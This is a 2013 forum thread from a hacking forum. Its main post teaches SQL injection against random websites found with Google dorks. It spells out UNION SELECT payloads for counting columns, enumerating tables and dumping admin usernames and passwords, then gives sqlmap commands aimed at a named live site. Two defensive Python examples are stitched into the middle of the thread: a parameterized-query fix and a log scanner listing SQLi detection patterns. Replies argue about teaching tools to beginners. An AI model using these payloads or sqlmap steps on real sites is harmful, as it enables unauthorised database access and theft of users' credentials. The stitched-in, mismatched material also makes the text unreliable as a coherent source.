Sinisterly
SQLi Tut + SQLmap! - Printable Version




SQLi Tut + SQLmap! - Adorapuff - 02-16-2013

Instinct and I are working on a tut.
I'm going to work on all the formatting here.

SQLi
What is SQLi?
SQLi is injecting a series of “custom” codes into a webpage to give you access to the database. You can get data such as admin user name and pass along with the usernames and passwords of the members of the website. SQLi is the most common and easiest method of “hacking” today.
Let’s get started.
List of dorks
inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:lay_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:ageid=
inurl:games.php?id=
inurl:age.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
More can be found here http://pastebin.com/1c0mvpJJ

You are going to enter a dork on Google and put a ‘ after the ?id=x
If you get an error saying something along the lines of: You have an error in your SQL syntax… then the site is vulnerable.

Finding the # columns
At the end of the site enter
Code:
order by 5--
For example
url.com/index.php?id=1 order by 5--
If the page reloads go up for example.
url.com/index.php?id=1 order by 10
If you get an error go down.
You want to get to the one right below the first error.
So if order by 7 is error but 6 is not, 6 is the number of columns.

Finding the vulnerable columns
Since there are 6 columns you are going to enter
Code:
Union Select 1,2,3,4,5,6--
and a - after the = sign
url.com/index.php?id=-1 Union Select 1,2,3,4,5,6--
You have to put a - after =
You should get some numbers showing up on the page. Those are the vulnerable columns.

Getting The Version
Pick a vulnerable column and replace it with
Code:
@@version

So for an example I'll use 2 as the vulnerable column
url.com/index.php?id=-1 Union Select 1, @@version,3,4,5,6--
or url.com/index.php?id=-1 Union Select 1, group_concat(@@version),3,4,5,6--
both work.
The result would be something along the lines of
Code:
5.1.37-1ubuntu5.5-log
the text doesn’t matter, but if the number is below 5 then it won’t work.

Getting The DB Name
Replace the vulnerable column with
Code:
concat(database())
This will get you the database name. Write it down.

Getting table name
Delete
Code:
concat(database())
and replace it with
Code:
group_concat(table_name)
and before -- put
Code:
FROM information_schema.tables WHERE table_schema=database()

Example
url.com/index.php?id=-1 Union Select 1, group_concat(table_name),3,4,5,6 FROM information_schema.tables WHERE table_schema=database() --
Now you are going to get a list. Look for anything having to do with admin, login, users, anything that could potentially have usernames and passwords. Convert the table name of your choice to hex via a text to hex convertor.
Getting Column Names
Now replace
Code:
group_concat(table_name)
with
Code:
group_concat(column_name)
and replace
Code:
FROM information_schema.tables WHERE table_schema=database()--
with
Code:
FROM information_schema.columns WHERE table_name=”0xhex Here”
without quotes. You need the 0x directly before the hex, so no space.
Getting The Data
Now if you picked the "right" column you should get something that says ID, Username, Password, and sometimes address, email and more.
Now replace
Code:
group_concat(column_name)
with the column(s) of your choice. If you want two columns you would have a 0x3a in between them with a comma after 0x3a, for example
Code:
group_concat(username0x3a,password)
You also have to replace
Code:
FROM information_schema.columns WHERE table_name=hexcharacters
with
Code:
FROM DBName.tablename
Replace DBName with the database name you got from the concat(database()) command earlier and tablename with the table name that you converted to hex, but you can use plain text for this one.

SQLmap

Quote:"sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections."

SQLmap is a tool that is used a lot because it does things much faster than doing them manually. I'd prefer that you know how to do a manual injection before you try this tool, or else you won't learn anything.

You can download SQLmap here: http://sqlmap.org/

Let's get started!

Things you need:
-A website vulnerable to a SQLi injection!
-A brain
-Python installed

I assume you know how a basic SQLi injection works.

I'm running Linux so I'll explain how to do it in Linux. On Windows it's basically the same except you have to add python ./sqlmap.py every time.

So I'm going to my SQLmap directory.
In my case it's
Code:
cd /home/instinct/SQLmap
[Image: cg9sf5h.png]

Alright, once we've found our vulnerable site, you want to get the databases. In order to do this you have to use this command:
Code:
./sqlmap.py -u http://senesco.com/newsitem.php?id=211 --dbs
The -u means it's going to give the site's URL.
The --dbs means it's going to fetch the databases.

Now once you've done that you'll get this screen:
[Image: OeSjMp5.png]

Those are the databases.

We want to take a look in infofir_SE
In order to do that you'll have to use this command:
Code:
./sqlmap.py -u http://senesco.com/newsitem.php?id=211 -D infofir_SE --tables
What this command does is get the tables from the database
-D infofir_SE is the database where we want the tables from
--tables means it's going to get the tables.

Once you've done that you'll see something like this:
[Image: ABv7Jws.png]

These are the tables.

Now for example we want to take a look in the table called "sec"
In order to do this we'll have to use this command
Code:
./sqlmap.py -u http://senesco.com/newsitem.php?id=211 -D infofir_SE -T sec --columns
-D infofir_SE is the database we want to extract the columns from.
-T sec is the table we want to extract the columns from.
--columns gets the columns from the table called 'sec' (-T sec)

Once you've done that you'll see this
[Image: ay0m2XZ.png]

These are the columns.

Now to look what's inside the columns you have to use this command:
Code:
./sqlmap.py -u http://senesco.com/newsitem.php?id=211 -D infofir_SE -T sec -C --dump
-C means the columns
--dump means getting the data and saving it to a file

The file will be saved to wherever your SQLmap folder is located and then “output” and search for the name of the site.

I hope you enjoyed this tutorial.

Devil Child
INST1NCT

Brought to you by The Goons!
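The manual part of the tutorial above leans on one thing: the value after ?id= is pasted straight into the SQL text, so "order by 5--" and "-1 union select ..." become part of the statement. The following is an added example, not code from the post or from any project it mentions: the same id parameter handled by a string-built query and by a parameterized one, against an in-memory SQLite database. The news table, its rows and the function names (fetch_news_vulnerable, fetch_news_parameterized) are constructed for this example; SQLite is used instead of MySQL because it needs no server, and its error text differs from the "You have an error in your SQL syntax" message the post quotes.

```python
# Added example (not code from the forum post): the same id parameter handled two ways,
# to show why the ORDER BY / UNION SELECT probes in the tutorial work against a
# string-built query and do nothing against a parameterized one.
# The table, rows and function names are all constructed for this example.
import sqlite3

# Constructed sample schema standing in for a news page like index.php?id=
SCHEMA = """
CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT, body TEXT);
INSERT INTO news VALUES (1, 'Welcome', 'First post');
INSERT INTO news VALUES (2, 'Update', 'Second post');
"""


def connect():
    """Fresh in-memory SQLite database loaded with the sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def fetch_news_vulnerable(conn, user_id):
    """The 'before': whatever follows ?id= is pasted into the SQL text.

    Returns the result rows, or the database error text. A page that echoes
    that error text is exactly what the tutorial's single-quote test looks for,
    and an ORDER BY past the last column errors while a valid one does not,
    which is the column-counting signal it describes.
    """
    sql = "SELECT id, title, body FROM news WHERE id=" + user_id
    try:
        return conn.execute(sql).fetchall()
    except sqlite3.OperationalError as exc:
        return "DB ERROR: " + str(exc)


def fetch_news_parameterized(conn, user_id):
    """The 'after': the id is validated and then bound as a parameter.

    The driver sends the value separately from the statement text, so a string
    such as '-1 union select 1,2,3--' can never change the query's shape; here
    it is rejected even earlier because it is not an integer.
    """
    try:
        id_value = int(user_id)
    except ValueError:
        return []  # bad input: no query is run, nothing is leaked
    sql = "SELECT id, title, body FROM news WHERE id=?"
    return conn.execute(sql, (id_value,)).fetchall()


if __name__ == "__main__":
    conn = connect()
    for probe in ("1", "1 order by 3--", "1 order by 5--", "-1 union select 1,2,3--"):
        print(repr(probe))
        print("  concatenated :", fetch_news_vulnerable(conn, probe))
        print("  parameterized:", fetch_news_parameterized(conn, probe))
```

Run it and compare the two columns of output: the concatenated version returns the attacker's chosen row (1, 2, 3) for the UNION probe and an error for "order by 5", while the parameterized version returns the real row for "1" and an empty result for everything else, with no error text to read. Echoing the driver's error message to the browser is the second half of the problem, and the fix there is to log it server-side and return a generic page.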

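Seen from the server side, the workflow in the post (a quote probe, ORDER BY counting, UNION SELECT, information_schema queries with database() or a hex table name) leaves a very recognisable trail in the access log. The following is an added example, not from the post: a small scanner that URL-decodes each request path, matches it against patterns for those probes, and reports per client which probes were seen and how many 5xx responses they drew. The log lines, IP addresses and pattern names are constructed for this example; the log format assumed is the common Apache/nginx "host ident user [time] "request" status bytes" layout.

```python
# Added example (not from the forum post): scan web-server access-log lines for the
# request patterns the tutorial walks through (quote probe, ORDER BY counting,
# UNION SELECT, information_schema enumeration, @@version/database(), hex literals)
# and report which client sent which probes. Log lines are constructed for this example.
import re
from urllib.parse import unquote_plus

# (name, regex) pairs; matched case-insensitively against the URL-decoded request path.
PROBE_PATTERNS = [
    ("sqli_quote_probe",  r"\?\w+=\d+'"),
    ("sqli_order_by",     r"\border\s+by\s+\d+"),
    ("sqli_union_select", r"\bunion\s+(?:all\s+)?select\b"),
    ("sqli_info_schema",  r"\binformation_schema\."),
    ("sqli_fingerprint",  r"@@version|\bdatabase\(\)"),
    ("sqli_hex_literal",  r"\b0x[0-9a-f]{4,}\b"),
]

# Apache/nginx "combined"-style line: host ident user [time] "request" status bytes ...
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)

# Constructed sample log: one client running the tutorial's sequence, one ordinary visitor.
SAMPLE_LOG = [
    '203.0.113.5 - - [16/Feb/2013:06:00:01 +0000] "GET /index.php?id=1 HTTP/1.1" 200 5120',
    '203.0.113.5 - - [16/Feb/2013:06:00:02 +0000] "GET /index.php?id=1%27 HTTP/1.1" 500 312',
    '203.0.113.5 - - [16/Feb/2013:06:00:03 +0000] "GET /index.php?id=1+order+by+5-- HTTP/1.1" 500 312',
    '203.0.113.5 - - [16/Feb/2013:06:00:04 +0000] "GET /index.php?id=-1+union+select+1,2,3,4,5,6-- HTTP/1.1" 200 4800',
    '203.0.113.5 - - [16/Feb/2013:06:00:05 +0000] "GET /index.php?id=-1+union+select+1,group_concat(table_name),3,4,5,6+from+information_schema.tables+where+table_schema=database()-- HTTP/1.1" 200 4900',
    '203.0.113.5 - - [16/Feb/2013:06:00:06 +0000] "GET /index.php?id=-1+union+select+1,group_concat(column_name),3,4,5,6+from+information_schema.columns+where+table_name=0x7573657273-- HTTP/1.1" 200 4950',
    '198.51.100.7 - - [16/Feb/2013:06:01:00 +0000] "GET /gallery.php?id=42 HTTP/1.1" 200 2200',
]


def classify(line):
    """Parse one log line. Returns None if the line is not in the expected format,
    otherwise a dict with client IP, HTTP status, decoded path and matched probe names."""
    m = LOG_LINE.match(line)
    if not m:
        return None
    # %27 -> ', + -> space: decode first so URL encoding cannot hide a probe
    path = unquote_plus(m.group("path"))
    hits = [name for name, pattern in PROBE_PATTERNS
            if re.search(pattern, path, re.IGNORECASE)]
    return {"ip": m.group("ip"), "status": int(m.group("status")), "path": path, "hits": hits}


def scan(lines):
    """Aggregate per client: distinct probe names seen and how many 5xx responses
    accompanied them. One client collecting several of these in order is the
    tutorial's workflow as it looks from the server."""
    per_ip = {}
    for line in lines:
        rec = classify(line)
        if not rec or not rec["hits"]:
            continue
        entry = per_ip.setdefault(rec["ip"], {"probes": set(), "errors": 0})
        entry["probes"].update(rec["hits"])
        if rec["status"] >= 500:
            entry["errors"] += 1
    return {ip: {"probes": sorted(e["probes"]), "errors": e["errors"]}
            for ip, e in per_ip.items()}


if __name__ == "__main__":
    for ip, summary in scan(SAMPLE_LOG).items():
        print(ip, summary)
```

The 500 responses matter as much as the patterns: a quote probe followed by a server error is the "site is vulnerable" signal the post describes, so a client whose probes coincide with 5xx responses deserves a closer look than one whose requests all returned normally. In a real deployment the same patterns belong in a WAF or SIEM rule rather than a script, and decoding before matching is the part most often forgotten.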

RE: The Goons SQLi Tut - Slacker - 02-16-2013

Great Tutorial, I have something similar to this from people walking me through the steps, but this is still helpful.


RE: The Goons SQLi Tut + SQLmap! - Dismas - 02-16-2013

Not a bad tutorial. I notice in all the pictures I'm calling INST1NCT.


RE: The Goons SQLi Tut + SQLmap! - Charon - 02-16-2013

Great job Devil Child,

keep it up.


RE: The Goons SQLi Tut + SQLmap! - BreShiE - 02-16-2013

Good tutorial, but I reckon you should delete the "sqlmap" tutorial. All skids that look at this will just be like "OH LOOK - FUCK THIS MANUAL SHIT - I HAZ TOOLZ". We should actually teach users how to execute SQL queries in the URL and not how to use tools to do it for us. Just my two cents.


RE: The Goons SQLi Tut + SQLmap! - Charon - 02-16-2013

(02-16-2013, 06:19 AM)BreShiE Wrote: Good tutorial, but I reckon you should delete the "sqlmap" tutorial. All skids that look at this will just be like "OH LOOK - FUCK THIS MANUAL SHIT - I HAZ TOOLZ". We should actually teach users how to execute SQL queries in the URL and not how to use tools to do it for us. Just my two cents.

I highly recommend to know the manual injection before using SQLmap. Although I have no problem people using SQLmap if they know what's happening about the scene. Because this tool just does it faster and more organized than what a manual injection could do.


RE: The Goons SQLi Tut + SQLmap! - BreShiE - 02-16-2013

(02-16-2013, 06:21 AM)INST1NCT Wrote:
(02-16-2013, 06:19 AM)BreShiE Wrote: Good tutorial, but I reckon you should delete the "sqlmap" tutorial. All skids that look at this will just be like "OH LOOK - FUCK THIS MANUAL SHIT - I HAZ TOOLZ". We should actually teach users how to execute SQL queries in the URL and not how to use tools to do it for us. Just my two cents.

I highly recommend to know the manual injection before using SQLmap. Although I have no problem people using SQLmap if they know what's happening about the scene. Because this tool just does it faster and more organized than what a manual injection could do.

Yes I know, this is why I use it myself, but I'm saying the kids in the scene now-a-days will just look for the quickest way to be a "h3cker" and not even bother learning about the subjects they're involved in. This is just personal preference, obviously you can do what you wish with this tutorial (@Devil Child) this is just my opinion.


RE: The Goons SQLi Tut + SQLmap! - Charon - 02-16-2013

(02-16-2013, 06:24 AM)BreShiE Wrote:
(02-16-2013, 06:21 AM)INST1NCT Wrote:
(02-16-2013, 06:19 AM)BreShiE Wrote: Good tutorial, but I reckon you should delete the "sqlmap" tutorial. All skids that look at this will just be like "OH LOOK - FUCK THIS MANUAL SHIT - I HAZ TOOLZ". We should actually teach users how to execute SQL queries in the URL and not how to use tools to do it for us. Just my two cents.

I highly recommend to know the manual injection before using SQLmap. Although I have no problem people using SQLmap if they know what's happening about the scene. Because this tool just does it faster and more organized than what a manual injection could do.

Yes I know, this is why I use it myself, but I'm saying the kids in the scene now-a-days will just look for the quickest way to be a "h3cker" and not even bother learning about the subjects they're involved in. This is just personal preference, obviously you can do what you wish with this tutorial (@Devil Child) this is just my opinion.

Well, there are always going to be skids, I think you can't prevent them. I think you shouldn't care about the 'others' and with 'others' I mean the skiddies. It will always happen. Also you shouldn't point out Devil Child for the SQLmap part, I've written the SQLmap part, and like I've told you I didn't make it so skiddies will use it without knowing what's happening behind the scenes. Anyway let's stop discussing this.


RE: The Goons SQLi Tut + SQLmap! - Adorapuff - 02-16-2013

(02-16-2013, 06:24 AM)BreShiE Wrote:
(02-16-2013, 06:21 AM)INST1NCT Wrote:
(02-16-2013, 06:19 AM)BreShiE Wrote: Good tutorial, but I reckon you should delete the "sqlmap" tutorial. All skids that look at this will just be like "OH LOOK - FUCK THIS MANUAL SHIT - I HAZ TOOLZ". We should actually teach users how to execute SQL queries in the URL and not how to use tools to do it for us. Just my two cents.

I highly recommend to know the manual injection before using SQLmap. Although I have no problem people using SQLmap if they know what's happening about the scene. Because this tool just does it faster and more organized than what a manual injection could do.

Yes I know, this is why I use it myself, but I'm saying the kids in the scene now-a-days will just look for the quickest way to be a "h3cker" and not even bother learning about the subjects they're involved in. This is just personal preference, obviously you can do what you wish with this tutorial (@Devil Child) this is just my opinion.

Breshie, I wrote the first part of the tutorial. I have no intention to use SQLMap until I fully master manual injection.